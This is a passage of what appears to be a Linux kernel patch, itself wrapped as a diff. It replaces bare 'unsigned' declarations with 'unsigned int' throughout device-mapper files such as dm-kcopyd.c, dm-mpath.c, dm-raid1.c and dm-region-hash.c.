+ 	char *new_data = (char *) param + param->data_start;
+ 	struct mapped_device *md;
+-	unsigned change_uuid = (param->flags & DM_UUID_FLAG) ? 1 : 0;
++	unsigned int change_uuid = (param->flags & DM_UUID_FLAG) ? 1 : 0;
+ 
+ 	if (new_data < param->data ||
+ 	    invalid_str(new_data, (void *) param + param_size) || !*new_data ||
+@@ -1096,7 +1096,7 @@ out:
+ static int do_suspend(struct dm_ioctl *param)
+ {
+ 	int r = 0;
+-	unsigned suspend_flags = DM_SUSPEND_LOCKFS_FLAG;
++	unsigned int suspend_flags = DM_SUSPEND_LOCKFS_FLAG;
+ 	struct mapped_device *md;
+ 
+ 	md = find_device(param);
+@@ -1125,7 +1125,7 @@ out:
+ static int do_resume(struct dm_ioctl *param)
+ {
+ 	int r = 0;
+-	unsigned suspend_flags = DM_SUSPEND_LOCKFS_FLAG;
++	unsigned int suspend_flags = DM_SUSPEND_LOCKFS_FLAG;
+ 	struct hash_cell *hc;
+ 	struct mapped_device *md;
+ 	struct dm_table *new_map, *old_map = NULL;
+@@ -1243,7 +1243,7 @@ static void retrieve_status(struct dm_table *table,
+ 	char *outbuf, *outptr;
+ 	status_type_t type;
+ 	size_t remaining, len, used = 0;
+-	unsigned status_flags = 0;
++	unsigned int status_flags = 0;
+ 
+ 	outptr = outbuf = get_result_buffer(param, param_size, &len);
+ 
+@@ -1648,8 +1648,8 @@ static int table_status(struct file *filp, struct dm_ioctl *param, size_t param_
+  * Returns a number <= 1 if message was processed by device mapper.
+  * Returns 2 if message should be delivered to the target.
+  */
+-static int message_for_md(struct mapped_device *md, unsigned argc, char **argv,
+-			  char *result, unsigned maxlen)
++static int message_for_md(struct mapped_device *md, unsigned int argc, char **argv,
++			  char *result, unsigned int maxlen)
+ {
+ 	int r;
+ 
+@@ -1859,7 +1859,7 @@ static int copy_params(struct dm_ioctl __user *user, struct dm_ioctl *param_kern
+ 	struct dm_ioctl *dmi;
+ 	int secure_data;
+ 	const size_t minimum_data_size = offsetof(struct dm_ioctl, data);
+-	unsigned noio_flag;
++	unsigned int noio_flag;
+ 
+ 	if (copy_from_user(param_kernel, user, minimum_data_size))
+ 		return -EFAULT;
+diff --git a/drivers/md/dm-kcopyd.c b/drivers/md/dm-kcopyd.c
+index 4d3bbbea2e9a8..0ef78e56aa88c 100644
+--- a/drivers/md/dm-kcopyd.c
++++ b/drivers/md/dm-kcopyd.c
+@@ -34,14 +34,14 @@
+ #define DEFAULT_SUB_JOB_SIZE_KB 512
+ #define MAX_SUB_JOB_SIZE_KB     1024
+ 
+-static unsigned kcopyd_subjob_size_kb = DEFAULT_SUB_JOB_SIZE_KB;
++static unsigned int kcopyd_subjob_size_kb = DEFAULT_SUB_JOB_SIZE_KB;
+ 
+ module_param(kcopyd_subjob_size_kb, uint, S_IRUGO | S_IWUSR);
+ MODULE_PARM_DESC(kcopyd_subjob_size_kb, "Sub-job size for dm-kcopyd clients");
+ 
+-static unsigned dm_get_kcopyd_subjob_size(void)
++static unsigned int dm_get_kcopyd_subjob_size(void)
+ {
+-	unsigned sub_job_size_kb;
++	unsigned int sub_job_size_kb;
+ 
+ 	sub_job_size_kb = __dm_get_module_param(&kcopyd_subjob_size_kb,
+ 						DEFAULT_SUB_JOB_SIZE_KB,
+@@ -56,9 +56,9 @@ static unsigned dm_get_kcopyd_subjob_size(void)
+  *---------------------------------------------------------------*/
+ struct dm_kcopyd_client {
+ 	struct page_list *pages;
+-	unsigned nr_reserved_pages;
+-	unsigned nr_free_pages;
+-	unsigned sub_job_size;
++	unsigned int nr_reserved_pages;
++	unsigned int nr_free_pages;
++	unsigned int sub_job_size;
+ 
+ 	struct dm_io_client *io_client;
+ 
+@@ -119,7 +119,7 @@ static DEFINE_SPINLOCK(throttle_spinlock);
+ 
+ static void io_job_start(struct dm_kcopyd_throttle *t)
+ {
+-	unsigned throttle, now, difference;
++	unsigned int throttle, now, difference;
+ 	int slept = 0, skew;
+ 
+ 	if (unlikely(!t))
+@@ -182,7 +182,7 @@ static void io_job_finish(struct dm_kcopyd_throttle *t)
+ 		goto skip_limit;
+ 
+ 	if (!t->num_io_jobs) {
+-		unsigned now, difference;
++		unsigned int now, difference;
+ 
+ 		now = jiffies;
+ 		difference = now - t->last_jiffies;
+@@ -303,9 +303,9 @@ static void drop_pages(struct page_list *pl)
+ /*
+  * Allocate and reserve nr_pages for the use of a specific client.
+  */
+-static int client_reserve_pages(struct dm_kcopyd_client *kc, unsigned nr_pages)
++static int client_reserve_pages(struct dm_kcopyd_client *kc, unsigned int nr_pages)
+ {
+-	unsigned i;
++	unsigned int i;
+ 	struct page_list *pl = NULL, *next;
+ 
+ 	for (i = 0; i < nr_pages; i++) {
+@@ -341,7 +341,7 @@ static void client_free_pages(struct dm_kcopyd_client *kc)
+ struct kcopyd_job {
+ 	struct dm_kcopyd_client *kc;
+ 	struct list_head list;
+-	unsigned flags;
++	unsigned int flags;
+ 
+ 	/*
+ 	 * Error state of the job.
+@@ -582,7 +582,7 @@ static int run_io_job(struct kcopyd_job *job)
+ static int run_pages_job(struct kcopyd_job *job)
+ {
+ 	int r;
+-	unsigned nr_pages = dm_div_up(job->dests[0].count, PAGE_SIZE >> 9);
++	unsigned int nr_pages = dm_div_up(job->dests[0].count, PAGE_SIZE >> 9);
+ 
+ 	r = kcopyd_get_pages(job->kc, nr_pages, &job->pages);
+ 	if (!r) {
+@@ -849,8 +849,8 @@ void dm_kcopyd_copy(struct dm_kcopyd_client *kc, struct dm_io_region *from,
+ EXPORT_SYMBOL(dm_kcopyd_copy);
+ 
+ void dm_kcopyd_zero(struct dm_kcopyd_client *kc,
+-		    unsigned num_dests, struct dm_io_region *dests,
+-		    unsigned flags, dm_kcopyd_notify_fn fn, void *context)
++		    unsigned int num_dests, struct dm_io_region *dests,
++		    unsigned int flags, dm_kcopyd_notify_fn fn, void *context)
+ {
+ 	dm_kcopyd_copy(kc, NULL, num_dests, dests, flags, fn, context);
+ }
+@@ -906,7 +906,7 @@ int kcopyd_cancel(struct kcopyd_job *job, int block)
+ struct dm_kcopyd_client *dm_kcopyd_client_create(struct dm_kcopyd_throttle *throttle)
+ {
+ 	int r;
+-	unsigned reserve_pages;
++	unsigned int reserve_pages;
+ 	struct dm_kcopyd_client *kc;
+ 
+ 	kc = kzalloc(sizeof(*kc), GFP_KERNEL);
+diff --git a/drivers/md/dm-linear.c b/drivers/md/dm-linear.c
+index 3212ef6aa81bb..26b1af6461771 100644
+--- a/drivers/md/dm-linear.c
++++ b/drivers/md/dm-linear.c
+@@ -95,7 +95,7 @@ static int linear_map(struct dm_target *ti, struct bio *bio)
+ }
+ 
+ static void linear_status(struct dm_target *ti, status_type_t type,
+-			  unsigned status_flags, char *result, unsigned maxlen)
++			  unsigned int status_flags, char *result, unsigned int maxlen)
+ {
+ 	struct linear_c *lc = (struct linear_c *) ti->private;
+ 	size_t sz = 0;
+diff --git a/drivers/md/dm-log-userspace-base.c b/drivers/md/dm-log-userspace-base.c
+index 9ab93ebea8895..9fc69382692bd 100644
+--- a/drivers/md/dm-log-userspace-base.c
++++ b/drivers/md/dm-log-userspace-base.c
+@@ -123,7 +123,7 @@ retry:
+ }
+ 
+ static int build_constructor_string(struct dm_target *ti,
+-				    unsigned argc, char **argv,
++				    unsigned int argc, char **argv,
+ 				    char **ctr_str)
+ {
+ 	int i, str_size;
+@@ -188,7 +188,7 @@ static void do_flush(struct work_struct *work)
+  * to the userspace ctr function.
+  */
+ static int userspace_ctr(struct dm_dirty_log *log, struct dm_target *ti,
+-			 unsigned argc, char **argv)
++			 unsigned int argc, char **argv)
+ {
+ 	int r = 0;
+ 	int str_size;
+@@ -792,7 +792,7 @@ static region_t userspace_get_sync_count(struct dm_dirty_log *log)
+  * Returns: amount of space consumed
+  */
+ static int userspace_status(struct dm_dirty_log *log, status_type_t status_type,
+-			    char *result, unsigned maxlen)
++			    char *result, unsigned int maxlen)
+ {
+ 	int r = 0;
+ 	char *table_args;
+diff --git a/drivers/md/dm-log-userspace-transfer.c b/drivers/md/dm-log-userspace-transfer.c
+index fdf8ec304f8d2..072559b709edd 100644
+--- a/drivers/md/dm-log-userspace-transfer.c
++++ b/drivers/md/dm-log-userspace-transfer.c
+@@ -142,7 +142,7 @@ static void cn_ulog_callback(struct cn_msg *msg, struct netlink_skb_parms *nsp)
+ 		fill_pkg(msg, NULL);
+ 	else if (msg->len < sizeof(*tfr))
+ 		DMERR("Incomplete message received (expected %u, got %u): [%u]",
+-		      (unsigned)sizeof(*tfr), msg->len, msg->seq);
++		      (unsigned int)sizeof(*tfr), msg->len, msg->seq);
+ 	else
+ 		fill_pkg(NULL, tfr);
+ 	spin_unlock(&receiving_list_lock);
+diff --git a/drivers/md/dm-log-writes.c b/drivers/md/dm-log-writes.c
+index 178e13a5b059f..efdfb2e1868a4 100644
+--- a/drivers/md/dm-log-writes.c
++++ b/drivers/md/dm-log-writes.c
+@@ -792,10 +792,10 @@ static int normal_end_io(struct dm_target *ti, struct bio *bio,
+  * INFO format: <logged entries> <highest allocated sector>
+  */
+ static void log_writes_status(struct dm_target *ti, status_type_t type,
+-			      unsigned status_flags, char *result,
+-			      unsigned maxlen)
++			      unsigned int status_flags, char *result,
++			      unsigned int maxlen)
+ {
+-	unsigned sz = 0;
++	unsigned int sz = 0;
+ 	struct log_writes_c *lc = ti->private;
+ 
+ 	switch (type) {
+@@ -844,8 +844,8 @@ static int log_writes_iterate_devices(struct dm_target *ti,
+  * Messages supported:
+  *   mark <mark data> - specify the marked data.
+  */
+-static int log_writes_message(struct dm_target *ti, unsigned argc, char **argv,
+-			      char *result, unsigned maxlen)
++static int log_writes_message(struct dm_target *ti, unsigned int argc, char **argv,
++			      char *result, unsigned int maxlen)
+ {
+ 	int r = -EINVAL;
+ 	struct log_writes_c *lc = ti->private;
+diff --git a/drivers/md/dm-log.c b/drivers/md/dm-log.c
+index cf10fa6677972..159f2c05dfd3c 100644
+--- a/drivers/md/dm-log.c
++++ b/drivers/md/dm-log.c
+@@ -223,7 +223,7 @@ struct log_c {
+ 	unsigned int region_count;
+ 	region_t sync_count;
+ 
+-	unsigned bitset_uint32_count;
++	unsigned int bitset_uint32_count;
+ 	uint32_t *clean_bits;
+ 	uint32_t *sync_bits;
+ 	uint32_t *recovering_bits;	/* FIXME: this seems excessive */
+@@ -255,20 +255,20 @@ struct log_c {
+  * The touched member needs to be updated every time we access
+  * one of the bitsets.
+  */
+-static inline int log_test_bit(uint32_t *bs, unsigned bit)
++static inline int log_test_bit(uint32_t *bs, unsigned int bit)
+ {
+ 	return test_bit_le(bit, bs) ? 1 : 0;
+ }
+ 
+ static inline void log_set_bit(struct log_c *l,
+-			       uint32_t *bs, unsigned bit)
++			       uint32_t *bs, unsigned int bit)
+ {
+ 	__set_bit_le(bit, bs);
+ 	l->touched_cleaned = 1;
+ }
+ 
+ static inline void log_clear_bit(struct log_c *l,
+-				 uint32_t *bs, unsigned bit)
++				 uint32_t *bs, unsigned int bit)
+ {
+ 	__clear_bit_le(bit, bs);
+ 	l->touched_dirtied = 1;
+@@ -582,7 +582,7 @@ static void fail_log_device(struct log_c *lc)
+ static int disk_resume(struct dm_dirty_log *log)
+ {
+ 	int r;
+-	unsigned i;
++	unsigned int i;
+ 	struct log_c *lc = (struct log_c *) log->context;
+ 	size_t size = lc->bitset_uint32_count * sizeof(uint32_t);
+ 
+diff --git a/drivers/md/dm-mpath.c b/drivers/md/dm-mpath.c
+index 0e325469a252a..91c25ad8eed84 100644
+--- a/drivers/md/dm-mpath.c
++++ b/drivers/md/dm-mpath.c
+@@ -29,7 +29,7 @@
+ 
+ #define DM_MSG_PREFIX "multipath"
+ #define DM_PG_INIT_DELAY_MSECS 2000
+-#define DM_PG_INIT_DELAY_DEFAULT ((unsigned) -1)
++#define DM_PG_INIT_DELAY_DEFAULT ((unsigned int) -1)
+ #define QUEUE_IF_NO_PATH_TIMEOUT_DEFAULT 0
+ 
+ static unsigned long queue_if_no_path_timeout_secs = QUEUE_IF_NO_PATH_TIMEOUT_DEFAULT;
+@@ -39,7 +39,7 @@ struct pgpath {
+ 	struct list_head list;
+ 
+ 	struct priority_group *pg;	/* Owning PG */
+-	unsigned fail_count;		/* Cumulative failure count */
++	unsigned int fail_count;		/* Cumulative failure count */
+ 
+ 	struct dm_path path;
+ 	struct delayed_work activate_path;
+@@ -59,8 +59,8 @@ struct priority_group {
+ 	struct multipath *m;		/* Owning multipath instance */
+ 	struct path_selector ps;
+ 
+-	unsigned pg_num;		/* Reference number */
+-	unsigned nr_pgpaths;		/* Number of paths in PG */
++	unsigned int pg_num;		/* Reference number */
++	unsigned int nr_pgpaths;		/* Number of paths in PG */
+ 	struct list_head pgpaths;
+ 
+ 	bool bypassed:1;		/* Temporarily bypass this PG? */
+@@ -78,14 +78,14 @@ struct multipath {
+ 	struct priority_group *next_pg;	/* Switch to this PG if set */
+ 
+ 	atomic_t nr_valid_paths;	/* Total number of usable paths */
+-	unsigned nr_priority_groups;
++	unsigned int nr_priority_groups;
+ 	struct list_head priority_groups;
+ 
+ 	const char *hw_handler_name;
+ 	char *hw_handler_params;
+ 	wait_queue_head_t pg_init_wait;	/* Wait for pg_init completion */
+-	unsigned pg_init_retries;	/* Number of times to retry pg_init */
+-	unsigned pg_init_delay_msecs;	/* Number of msecs before pg_init retry */
++	unsigned int pg_init_retries;	/* Number of times to retry pg_init */
++	unsigned int pg_init_delay_msecs;	/* Number of msecs before pg_init retry */
+ 	atomic_t pg_init_in_progress;	/* Only one pg_init allowed at once */
+ 	atomic_t pg_init_count;		/* Number of times pg_init called */
+ 
+@@ -397,7 +397,7 @@ static struct pgpath *choose_pgpath(struct multipath *m, size_t nr_bytes)
+ 	unsigned long flags;
+ 	struct priority_group *pg;
+ 	struct pgpath *pgpath;
+-	unsigned bypassed = 1;
++	unsigned int bypassed = 1;
+ 
+ 	if (!atomic_read(&m->nr_valid_paths)) {
+ 		spin_lock_irqsave(&m->lock, flags);
+@@ -840,7 +840,7 @@ static int parse_path_selector(struct dm_arg_set *as, struct priority_group *pg,
+ {
+ 	int r;
+ 	struct path_selector_type *pst;
+-	unsigned ps_argc;
++	unsigned int ps_argc;
+ 
+ 	static const struct dm_arg _args[] = {
+ 		{0, 1024, "invalid number of path selector args"},
+@@ -983,7 +983,7 @@ static struct priority_group *parse_priority_group(struct dm_arg_set *as,
+ 	};
+ 
+ 	int r;
+-	unsigned i, nr_selector_args, nr_args;
++	unsigned int i, nr_selector_args, nr_args;
+ 	struct priority_group *pg;
+ 	struct dm_target *ti = m->ti;
+ 
+@@ -1049,7 +1049,7 @@ static struct priority_group *parse_priority_group(struct dm_arg_set *as,
+ 
+ static int parse_hw_handler(struct dm_arg_set *as, struct multipath *m)
+ {
+-	unsigned hw_argc;
++	unsigned int hw_argc;
+ 	int ret;
+ 	struct dm_target *ti = m->ti;
+ 
+@@ -1101,7 +1101,7 @@ fail:
+ static int parse_features(struct dm_arg_set *as, struct multipath *m)
+ {
+ 	int r;
+-	unsigned argc;
++	unsigned int argc;
+ 	struct dm_target *ti = m->ti;
+ 	const char *arg_name;
+ 
+@@ -1170,7 +1170,7 @@ static int parse_features(struct dm_arg_set *as, struct multipath *m)
+ 	return r;
+ }
+ 
+-static int multipath_ctr(struct dm_target *ti, unsigned argc, char **argv)
++static int multipath_ctr(struct dm_target *ti, unsigned int argc, char **argv)
+ {
+ 	/* target arguments */
+ 	static const struct dm_arg _args[] = {
+@@ -1181,8 +1181,8 @@ static int multipath_ctr(struct dm_target *ti, unsigned argc, char **argv)
+ 	int r;
+ 	struct multipath *m;
+ 	struct dm_arg_set as;
+-	unsigned pg_count = 0;
+-	unsigned next_pg_num;
++	unsigned int pg_count = 0;
++	unsigned int next_pg_num;
+ 	unsigned long flags;
+ 
+ 	as.argc = argc;
+@@ -1224,7 +1224,7 @@ static int multipath_ctr(struct dm_target *ti, unsigned argc, char **argv)
+ 	/* parse the priority groups */
+ 	while (as.argc) {
+ 		struct priority_group *pg;
+-		unsigned nr_valid_paths = atomic_read(&m->nr_valid_paths);
++		unsigned int nr_valid_paths = atomic_read(&m->nr_valid_paths);
+ 
+ 		pg = parse_priority_group(&as, m);
+ 		if (IS_ERR(pg)) {
+@@ -1365,7 +1365,7 @@ static int reinstate_path(struct pgpath *pgpath)
+ 	int r = 0, run_queue = 0;
+ 	unsigned long flags;
+ 	struct multipath *m = pgpath->pg->m;
+-	unsigned nr_valid_paths;
++	unsigned int nr_valid_paths;
+ 
+ 	spin_lock_irqsave(&m->lock, flags);
+ 
+@@ -1454,7 +1454,7 @@ static void bypass_pg(struct multipath *m, struct priority_group *pg,
+ static int switch_pg_num(struct multipath *m, const char *pgstr)
+ {
+ 	struct priority_group *pg;
+-	unsigned pgnum;
++	unsigned int pgnum;
+ 	unsigned long flags;
+ 	char dummy;
+ 
+@@ -1487,7 +1487,7 @@ static int switch_pg_num(struct multipath *m, const char *pgstr)
+ static int bypass_pg_num(struct multipath *m, const char *pgstr, bool bypassed)
+ {
+ 	struct priority_group *pg;
+-	unsigned pgnum;
++	unsigned int pgnum;
+ 	char dummy;
+ 
+ 	if (!pgstr || (sscanf(pgstr, "%u%c", &pgnum, &dummy) != 1) || !pgnum ||
+@@ -1789,14 +1789,14 @@ static void multipath_resume(struct dm_target *ti)
+  *      num_paths num_selector_args [path_dev [selector_args]* ]+ ]+
+  */
+ static void multipath_status(struct dm_target *ti, status_type_t type,
+-			     unsigned status_flags, char *result, unsigned maxlen)
++			     unsigned int status_flags, char *result, unsigned int maxlen)
+ {
+ 	int sz = 0, pg_counter, pgpath_counter;
+ 	unsigned long flags;
+ 	struct multipath *m = ti->private;
+ 	struct priority_group *pg;
+ 	struct pgpath *p;
+-	unsigned pg_num;
++	unsigned int pg_num;
+ 	char state;
+ 
+ 	spin_lock_irqsave(&m->lock, flags);
+@@ -1948,8 +1948,8 @@ static void multipath_status(struct dm_target *ti, status_type_t type,
+ 	spin_unlock_irqrestore(&m->lock, flags);
+ }
+ 
+-static int multipath_message(struct dm_target *ti, unsigned argc, char **argv,
+-			     char *result, unsigned maxlen)
++static int multipath_message(struct dm_target *ti, unsigned int argc, char **argv,
++			     char *result, unsigned int maxlen)
+ {
+ 	int r = -EINVAL;
+ 	struct dm_dev *dev;
+diff --git a/drivers/md/dm-mpath.h b/drivers/md/dm-mpath.h
+index e230f71962596..5343698fe5f1b 100644
+--- a/drivers/md/dm-mpath.h
++++ b/drivers/md/dm-mpath.h
+@@ -17,6 +17,6 @@ struct dm_path {
+ };
+ 
+ /* Callback for hwh_pg_init_fn to use when complete */
+-void dm_pg_init_complete(struct dm_path *path, unsigned err_flags);
++void dm_pg_init_complete(struct dm_path *path, unsigned int err_flags);
+ 
+ #endif
+diff --git a/drivers/md/dm-path-selector.h b/drivers/md/dm-path-selector.h
+index 83cac2b04b668..0f2b37af87662 100644
+--- a/drivers/md/dm-path-selector.h
++++ b/drivers/md/dm-path-selector.h
+@@ -52,7 +52,7 @@ struct path_selector_type {
+ 	/*
+ 	 * Constructs a path selector object, takes custom arguments
+ 	 */
+-	int (*create) (struct path_selector *ps, unsigned argc, char **argv);
++	int (*create) (struct path_selector *ps, unsigned int argc, char **argv);
+ 	void (*destroy) (struct path_selector *ps);
+ 
+ 	/*
+diff --git a/drivers/md/dm-ps-io-affinity.c b/drivers/md/dm-ps-io-affinity.c
+index f74501e65a8ed..76ce4ce872229 100644
+--- a/drivers/md/dm-ps-io-affinity.c
++++ b/drivers/md/dm-ps-io-affinity.c
+@@ -108,7 +108,7 @@ free_pi:
+ 	return ret;
+ }
+ 
+-static int ioa_create(struct path_selector *ps, unsigned argc, char **argv)
++static int ioa_create(struct path_selector *ps, unsigned int argc, char **argv)
+ {
+ 	struct selector *s;
+ 
+@@ -138,7 +138,7 @@ free_selector:
+ static void ioa_destroy(struct path_selector *ps)
+ {
+ 	struct selector *s = ps->context;
+-	unsigned cpu;
++	unsigned int cpu;
+ 
+ 	for_each_cpu(cpu, s->path_mask)
+ 		ioa_free_path(s, cpu);
+diff --git a/drivers/md/dm-ps-queue-length.c b/drivers/md/dm-ps-queue-length.c
+index cef70657bbbc2..6fbec9fc242d9 100644
+--- a/drivers/md/dm-ps-queue-length.c
++++ b/drivers/md/dm-ps-queue-length.c
+@@ -35,7 +35,7 @@ struct selector {
+ struct path_info {
+ 	struct list_head	list;
+ 	struct dm_path		*path;
+-	unsigned		repeat_count;
++	unsigned int		repeat_count;
+ 	atomic_t		qlen;	/* the number of in-flight I/Os */
+ };
+ 
+@@ -52,7 +52,7 @@ static struct selector *alloc_selector(void)
+ 	return s;
+ }
+ 
+-static int ql_create(struct path_selector *ps, unsigned argc, char **argv)
++static int ql_create(struct path_selector *ps, unsigned int argc, char **argv)
+ {
+ 	struct selector *s = alloc_selector();
+ 
+@@ -84,9 +84,9 @@ static void ql_destroy(struct path_selector *ps)
+ }
+ 
+ static int ql_status(struct path_selector *ps, struct dm_path *path,
+-		     status_type_t type, char *result, unsigned maxlen)
++		     status_type_t type, char *result, unsigned int maxlen)
+ {
+-	unsigned sz = 0;
++	unsigned int sz = 0;
+ 	struct path_info *pi;
+ 
+ 	/* When called with NULL path, return selector status/args. */
+@@ -116,7 +116,7 @@ static int ql_add_path(struct path_selector *ps, struct dm_path *path,
+ {
+ 	struct selector *s = ps->context;
+ 	struct path_info *pi;
+-	unsigned repeat_count = QL_MIN_IO;
++	unsigned int repeat_count = QL_MIN_IO;
+ 	char dummy;
+ 	unsigned long flags;
+ 
+diff --git a/drivers/md/dm-ps-round-robin.c b/drivers/md/dm-ps-round-robin.c
+index 27f44c5fa04e8..1d07392b5ed48 100644
+--- a/drivers/md/dm-ps-round-robin.c
++++ b/drivers/md/dm-ps-round-robin.c
+@@ -26,7 +26,7 @@
+ struct path_info {
+ 	struct list_head list;
+ 	struct dm_path *path;
+-	unsigned repeat_count;
++	unsigned int repeat_count;
+ };
+ 
+ static void free_paths(struct list_head *paths)
+@@ -62,7 +62,7 @@ static struct selector *alloc_selector(void)
+ 	return s;
+ }
+ 
+-static int rr_create(struct path_selector *ps, unsigned argc, char **argv)
++static int rr_create(struct path_selector *ps, unsigned int argc, char **argv)
+ {
+ 	struct selector *s;
+ 
+@@ -119,7 +119,7 @@ static int rr_add_path(struct path_selector *ps, struct dm_path *path,
+ {
+ 	struct selector *s = ps->context;
+ 	struct path_info *pi;
+-	unsigned repeat_count = RR_MIN_IO;
++	unsigned int repeat_count = RR_MIN_IO;
+ 	char dummy;
+ 	unsigned long flags;
+ 
+diff --git a/drivers/md/dm-ps-service-time.c b/drivers/md/dm-ps-service-time.c
+index 3ec9c33265c52..84d26234dc053 100644
+--- a/drivers/md/dm-ps-service-time.c
++++ b/drivers/md/dm-ps-service-time.c
+@@ -30,8 +30,8 @@ struct selector {
+ struct path_info {
+ 	struct list_head list;
+ 	struct dm_path *path;
+-	unsigned repeat_count;
+-	unsigned relative_throughput;
++	unsigned int repeat_count;
++	unsigned int relative_throughput;
+ 	atomic_t in_flight_size;	/* Total size of in-flight I/Os */
+ };
+ 
+@@ -48,7 +48,7 @@ static struct selector *alloc_selector(void)
+ 	return s;
+ }
+ 
+-static int st_create(struct path_selector *ps, unsigned argc, char **argv)
++static int st_create(struct path_selector *ps, unsigned int argc, char **argv)
+ {
+ 	struct selector *s = alloc_selector();
+ 
+@@ -80,9 +80,9 @@ static void st_destroy(struct path_selector *ps)
+ }
+ 
+ static int st_status(struct path_selector *ps, struct dm_path *path,
+-		     status_type_t type, char *result, unsigned maxlen)
++		     status_type_t type, char *result, unsigned int maxlen)
+ {
+-	unsigned sz = 0;
++	unsigned int sz = 0;
+ 	struct path_info *pi;
+ 
+ 	if (!path)
+@@ -113,8 +113,8 @@ static int st_add_path(struct path_selector *ps, struct dm_path *path,
+ {
+ 	struct selector *s = ps->context;
+ 	struct path_info *pi;
+-	unsigned repeat_count = ST_MIN_IO;
+-	unsigned relative_throughput = 1;
++	unsigned int repeat_count = ST_MIN_IO;
++	unsigned int relative_throughput = 1;
+ 	char dummy;
+ 	unsigned long flags;
+ 
+diff --git a/drivers/md/dm-raid.c b/drivers/md/dm-raid.c
+index 54263679a7b14..b26c12856b1db 100644
+--- a/drivers/md/dm-raid.c
++++ b/drivers/md/dm-raid.c
+@@ -3712,7 +3712,7 @@ static void raid_status(struct dm_target *ti, status_type_t type,
+ }
+ 
+ static int raid_message(struct dm_target *ti, unsigned int argc, char **argv,
+-			char *result, unsigned maxlen)
++			char *result, unsigned int maxlen)
+ {
+ 	struct raid_set *rs = ti->private;
+ 	struct mddev *mddev = &rs->md;
+diff --git a/drivers/md/dm-raid1.c b/drivers/md/dm-raid1.c
+index 06a38dc320253..8bd7e87d3538e 100644
+--- a/drivers/md/dm-raid1.c
++++ b/drivers/md/dm-raid1.c
+@@ -82,7 +82,7 @@ struct mirror_set {
+ 
+ 	struct work_struct trigger_event;
+ 
+-	unsigned nr_mirrors;
++	unsigned int nr_mirrors;
+ 	struct mirror mirror[];
+ };
+ 
+@@ -327,7 +327,7 @@ static void recovery_complete(int read_err, unsigned long write_err,
+ 
+ static void recover(struct mirror_set *ms, struct dm_region *reg)
+ {
+-	unsigned i;
++	unsigned int i;
+ 	struct dm_io_region from, to[DM_KCOPYD_MAX_REGIONS], *dest;
+ 	struct mirror *m;
+ 	unsigned long flags = 0;
+@@ -593,7 +593,7 @@ static void do_reads(struct mirror_set *ms, struct bio_list *reads)
+ 
+ static void write_callback(unsigned long error, void *context)
+ {
+-	unsigned i;
++	unsigned int i;
+ 	struct bio *bio = (struct bio *) context;
+ 	struct mirror_set *ms;
+ 	int should_wake = 0;
+@@ -963,10 +963,10 @@ static int get_mirror(struct mirror_set *ms, struct dm_target *ti,
+  * Create dirty log: log_type #log_params <log_params>
+  */
+ static struct dm_dirty_log *create_dirty_log(struct dm_target *ti,
+-					     unsigned argc, char **argv,
+-					     unsigned *args_used)
++					     unsigned int argc, char **argv,
++					     unsigned int *args_used)
+ {
+-	unsigned param_count;
++	unsigned int param_count;
+ 	struct dm_dirty_log *dl;
+ 	char dummy;
+ 
+@@ -997,10 +997,10 @@ static struct dm_dirty_log *create_dirty_log(struct dm_target *ti,
+ 	return dl;
+ }
+ 
+-static int parse_features(struct mirror_set *ms, unsigned argc, char **argv,
+-			  unsigned *args_used)
++static int parse_features(struct mirror_set *ms, unsigned int argc, char **argv,
++			  unsigned int *args_used)
+ {
+-	unsigned num_features;
++	unsigned int num_features;
+ 	struct dm_target *ti = ms->ti;
+ 	char dummy;
+ 	int i;
+@@ -1389,7 +1389,7 @@ static char device_status_char(struct mirror *m)
+ 
+ 
+ static void mirror_status(struct dm_target *ti, status_type_t type,
+-			  unsigned status_flags, char *result, unsigned maxlen)
++			  unsigned int status_flags, char *result, unsigned int maxlen)
+ {
+ 	unsigned int m, sz = 0;
+ 	int num_feature_args = 0;
+@@ -1458,7 +1458,7 @@ static int mirror_iterate_devices(struct dm_target *ti,
+ {
+ 	struct mirror_set *ms = ti->private;
+ 	int ret = 0;
+-	unsigned i;
++	unsigned int i;
+ 
+ 	for (i = 0; !ret && i < ms->nr_mirrors; i++)
+ 		ret = fn(ti, ms->mirror[i].dev,
+diff --git a/drivers/md/dm-region-hash.c b/drivers/md/dm-region-hash.c
+index 1f760451e6f48..adbdb4b671372 100644
+--- a/drivers/md/dm-region-hash.c
++++ b/drivers/md/dm-region-hash.c
+@@ -56,17 +56,17 @@
+  *---------------------------------------------------------------*/
+ struct dm_region_hash {
+ 	uint32_t region_size;
+-	unsigned region_shift;
++	unsigned int region_shift;
+ 
+ 	/* holds persistent region state */
+ 	struct dm_dirty_log *log;
+ 
+ 	/* hash table */
+ 	rwlock_t hash_lock;
+-	unsigned mask;
+-	unsigned nr_buckets;
+-	unsigned prime;
+-	unsigned shift;
++	unsigned int mask;
++	unsigned int nr_buckets;
++	unsigned int prime;
++	unsigned int shift;
+ 	struct list_head *buckets;
+ 
+ 	/*
+@@ -74,7 +74,7 @@ struct dm_region_hash {
+ 	 */
+ 	int flush_failure;
+ 
+-	unsigned max_recovery; /* Max # of regions to recover in parallel */
++	unsigned int max_recovery; /* Max # of regions to recover in parallel */
+ 
+ 	spinlock_t region_lock;
+ 	atomic_t recovery_in_flight;
+@@ -163,12 +163,12 @@ struct dm_region_hash *dm_region_hash_create(
+ 						     struct bio_list *bios),
+ 		void (*wakeup_workers)(void *context),
+ 		void (*wakeup_all_recovery_waiters)(void *context),
+-		sector_t target_begin, unsigned max_recovery,
++		sector_t target_begin, unsigned int max_recovery,
+ 		struct dm_dirty_log *log, uint32_t region_size,
+ 		region_t nr_regions)
+ {
+ 	struct dm_region_hash *rh;
+-	unsigned nr_buckets, max_buckets;
++	unsigned int nr_buckets, max_buckets;
+ 	size_t i;
+ 	int ret;
+ 
+@@ -236,7 +236,7 @@ EXPORT_SYMBOL_GPL(dm_region_hash_create);
+ 
+ void dm_region_hash_destroy(struct dm_region_hash *rh)
+ {
+-	unsigned h;
++	unsigned int h;
+ 	struct dm_region *reg, *nreg;
+ 
+ 	BUG_ON(!list_empty(&rh->quiesced_regions));
+@@ -263,9 +263,9 @@ struct dm_dirty_log *dm_rh_dirty_log(struct dm_region_hash *rh)
+ }
+ EXPORT_SYMBOL_GPL(dm_rh_dirty_log);
+ 
+-static unsigned rh_hash(struct dm_region_hash *rh, region_t region)
++static unsigned int rh_hash(struct dm_region_hash *rh, region_t region)
+ {
+-	return (unsigned) ((region * rh->prime) >> rh->shift) & rh->mask;
++	return (unsigned int) ((region * rh->prime) >> rh->shift) & rh->mask;
+ }
+ 
+ static struct dm_region *__rh_lookup(struct dm_region_hash *rh, region_t region)
